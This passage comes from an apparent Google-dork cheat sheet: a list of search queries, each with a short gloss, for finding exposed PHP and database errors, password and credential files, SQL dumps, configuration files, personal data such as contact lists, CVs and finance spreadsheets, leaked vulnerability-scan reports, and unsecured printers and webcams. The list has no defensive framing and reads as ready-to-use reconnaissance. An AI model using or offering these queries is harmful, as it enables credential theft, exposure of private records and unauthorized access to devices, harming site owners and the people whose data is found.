access-related PHP errors, potentially containing filenames, function names and file structure information

“ORA-00921: unexpected end of SQL command”

Oracle database errors, potentially containing filenames, function names and file structure information

“error found handling the request” cocoon filetype:xml

Cocoon errors, potentially containing Cocoon version information, filenames, function names and file structure information

“Invision Power Board Database Error”

Invision Power Board bulletin board errors, potentially containing function names, filenames, file structure information and piece of SQL code

“Warning: mysql _ query()” “invalid query”

MySQL database errors, potentially containing user names, function names, filenames and file structure information

“Error Message : Error loading required libraries.”

CGI script errors, potentially containing information about operating system and program versions, user names, filenames and file structure information

“#mysql dump” filetype:sql

MySQL database errors, potentially containing information about database structure and contents

Dork for locating passwords

http://*:*@www” site

passwords for site, stored as the string “http://username:password@www…”

filetype:bak inurl:”htaccess|passwd|shadow|ht users”

file backups, potentially containing user names and passwords

filetype:mdb inurl:”account|users|admin|admin istrators|passwd|password”

mdb files, potentially containing password information

intitle:”Index of” pwd.db

pwd.db files, potentially containing user names and encrypted passwords

inurl:admin inurl:backup intitle:index.of

directories whose names contain the words admin and backup

“Index of/” “Parent Directory” “WS _ FTP.ini”

filetype:ini WS _ FTP PWD

WS_FTP configuration files, potentially containing FTP server access passwords

ext:pwd inurl:(service|authors|administrators |users) “# -FrontPage-”

files containing Microsoft FrontPage passwords

filetype:sql (“passwd values ****” | “password values ****” | “pass values ****” )

files containing SQL code and passwords inserted into a database

intitle:index.of trillian.ini

configuration files for the Trillian IM

eggdrop filetype:user

user configuration files for the Eggdrop ircbot

filetype:conf slapd.conf

configuration files for OpenLDAP

inurl:”wvdial.conf” intext:”password”

configuration files for WV Dial

ext:ini eudora.ini

configuration files for the Eudora mail client

filetype:mdb inurl:users.mdb

Microsoft Access files, potentially containing user account information

Searching for personal data and confidential documents

filetype:xls inurl:”email.xls”

email.xls files, potentially containing contact information

“phone * * *” “address *” “e-mail” intitle: “curriculum vitae”

CVs

“not for distribution”

confidential documents containing the confidential clause

buddylist.blt

AIM contacts list

intitle:index.of mystuff.xml

Trillian IM contacts list

filetype:ctt “msn”

MSN contacts list

filetype:QDF

QDF database files for the Quicken financial application

intitle:index.of finances.xls

finances.xls files, potentially containing information on bank accounts, financial summaries and credit card numbers

intitle:”Index Of” -inurl:maillog maillog size

maillog files, potentially containing e-mail

Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”

reports for network security scans, penetration tests etc

dork for locating network devices

“Copyright (c) Tektronix, Inc.” “printer status”

PhaserLink printers

inurl:”printer/main.html” intext:”settings”

Brother HL printers

intitle:”Dell Laser Printer” ews

Dell printers with EWS technology

intext:centreware inurl:status

Xerox Phaser 4500/6250/8200/8400 printers

inurl:hp/device/this.LCDispatcher

HP printers

intitle:liveapplet inurl:LvAppl

Canon Webview webcams

intitle:”EvoCam” inurl:”webcam.html”

Evocam webcams

inurl:”ViewerFrame?Mode=”

Panasonic Network Camera webcams

(intext:”MOBOTIX M1″ | intext:”MOBOTIX M10″) intext:”Open Menu” Shift-Reload

Mobotix webcams

inurl:indexFrame.shtml Axis

Axis webcams

intitle:”my webcamXP server!” inurl:”:8080″

webcams accessible via WebcamXP Server

allintitle:Brains, Corp.

camera webcams accessible via mmEye

intitle:”active webcam page”